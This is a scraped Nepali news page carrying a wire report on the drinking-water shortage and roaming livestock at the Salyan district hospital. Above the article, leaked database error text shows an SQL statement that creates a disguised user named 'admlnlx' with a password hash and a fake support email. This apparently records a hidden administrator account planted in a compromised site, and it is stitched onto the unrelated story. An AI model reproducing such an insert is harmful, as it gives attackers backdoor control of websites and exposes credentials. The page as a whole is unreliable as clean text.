WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHxHvpDbZIeL.0SvrL0ZLo.eAFK8a7.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 12:08:59', '', 'admlnlx', 'admlnlx')
सल्यान, माघ २८-
जिल्ला अस्पताल सल्यानमा खानेपानीको अभाव हुँदा सरसफाइमा समेत समस्या देखिएको छ । दिनहँुजसो हुने शल्यक्रिया तथा अन्य सरसफाइका लागि पानीको अभाव भएपछि अस्पतालको शौचालयसमेत दुर्गन्धित भएको छ ।
हप्तामा एक÷दुईपटक दुई घन्टा मात्र आपूर्ति हुने खानेपानीले अस्पतालको मागको १० प्रतिशतसम्म पनि धान्न नसक्ने जिल्ला स्वास्थ्य प्रमुख डा मनिषा रावलले जानकारी दिनुभयो । अस्पतालजस्तो अति संवेदनशील संस्थामा पानी आपूर्ति सहज नहुँदा स्वाथ्योपचारमा समेत समस्या भएको डा रावलले बताउनुभयो ।अस्पतालमा पानीको आपूर्ति सहज भएमा फोहोर व्यवस्थापन गर्न समस्या नहुने उहाँको भनाइ छ ।
जिल्ला अस्पताललाई तारबारले नघेरिएको कारण स्थानीयवासीका चौपायाले समेत दुःख दिन थालेका छन् । स्थानीयवासीका गाई, बाख्रा अस्पताल परिसरमा छिरेर फोहोर गर्ने भएकाले पनि समस्या देखिएको छ । अस्पतालको जनरल वार्ड बाहिर राखिएको बेडमा गएर बाख्रा बस्ने त्यही मलमूत्र गर्ने तथा अन्य स्थानमा समेत फोहर गर्ने भएकोले समस्या भएको डा रावलले बताउनुभयो । चैपायालाई छाडा नछोडिदिन पटक÷पटक भनेको भए पनि स्थानीयवासीले सुधार नगरेको उहाँको गुनासो छ । – रासस